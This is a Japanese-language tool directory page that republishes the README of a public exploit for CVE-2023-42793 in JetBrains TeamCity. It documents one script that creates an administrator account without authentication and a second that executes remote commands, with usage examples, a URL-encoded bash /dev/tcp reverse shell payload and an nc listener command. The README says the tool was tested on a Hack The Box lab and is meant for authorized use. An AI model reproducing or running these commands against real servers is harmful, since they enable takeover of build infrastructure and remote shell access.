Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-42793 — JetBrains TeamCity 2023.05.3 - リモートコード実行 (RCE), CVE-2023-42793 | Kitploit
ツール/GitHubGitHub/b4l3ri0n/cve-2023-42793
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツール
GitHubb4l3ri0n/cve-2023-42793

CVE-2023-42793

JetBrains TeamCity 2023.05.3 - リモートコード実行 (RCE), CVE-2023-42793

リポジトリを見る
1132年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2023-42793 - TeamCity 管理者アカウント作成によるRCE

最初にexploit.pyを使用して管理者アカウントを作成し、次にrce.pyを使用してターゲット上でコマンドを実行します。リバースシェルについてはこちらを確認してください。

エクスプロイトスクリプト

説明

このスクリプトはCVE-2023-42793を悪用してTeamCityサーバーに管理者アカウントを作成します。指定されたまたはランダムな認証情報を持つ管理者ユーザーを作成するために、ターゲットURLにPOSTリクエストを送信します。

使用方法

root@kitploit:~
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]

オプション

  • -u, --url URL: ターゲットURL(必須)
  • -v, --verbose: 詳細モードを有効にする
  • -n, --username USERNAME: ユーザー名を指定(デフォルト:ランダム)
  • -p, --password PASSWORD: パスワードを指定(デフォルト:ランダム)
  • -e, --email EMAIL: メールアドレスを指定(デフォルト:ランダム)
  • -t, --token-file: トークンを保存するファイル

前提条件

  • Python 3.x
  • Pythonライブラリ
    • 依存関係をインストールするには pip3 install -r requirements.txt

例

  1. ランダムなユーザー名、パスワード、メールアドレスでエクスプロイトを実行:

    root@kitploit:~
    python exploit.py -u http://target.com
    
  2. 指定されたユーザー名、パスワード、メールアドレスでエクスプロイトを実行:

    root@kitploit:~
    python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
    

出力

エクスプロイトが成功すると、スクリプトは作成された管理者アカウントのURL、ユーザー名、パスワードを表示し、その出力をトークンファイルに保存します。

リモートコード実行(RCE)スクリプト

説明

このスクリプトは、CVE-2023-42793を悪用して脆弱なTeamCityサーバー上でコマンドを実行できるようにします。まずデバッグプロセスを有効にし、次に適切なAPIエンドポイントを使用して指定されたコマンドを実行します。

使用方法

root@kitploit:~
python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]

オプション

  • -u, --url URL : ターゲットURL(必須)
  • -t, --token-file : トークンを含むファイルを指定
  • -c, --command COMMAND: 実行するコマンドを指定(RCE)
  • -P, --port PORT: ポートを指定(デフォルトは80)

例

指定されたコマンドでエクスプロイトを実行:

root@kitploit:~
python rce.py -u http://target.com -t token -c "whoami"

リバースシェルの場合

root@kitploit:~
python3 rce.py -u http://target.com -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
  • このリバースシェルコマンドでは、{IP}を自分のIPアドレスに、{port}をリッスンしているポートに置き換えてください。
  • ncを使用してリスナーを作成します。例:nc -nvlp 5555
  • 詳細はrevshellsを確認してください。

注意事項

  • このスクリプトはHack The BoxのRunner.htbでテストされました。
  • このスクリプトは教育目的のみに使用してください。
  • 責任を持って、テストを許可されたシステムでのみ使用してください。

クレジット

  • Zyad Elsayed
    • GitHub Repository: Zyad-Elsayed
    • LinkedIn account: zyad-abdelbary
  • 管理者アカウント用の元のエクスプロイト:ByteHunter (Exploit-DB)

リソース

  • CVE-2023-42793 Description: CVE脆弱性の公式説明。
  • Exploit Database Entry: Exploit Database上の元のエクスプロイトコード。
  • TeamCity Blog: TeamCityのCVE-2023-42793脆弱性についてのブログ記事。
  • TeamCity Documentation: TeamCityの公式ドキュメント。
ツールをダウンロード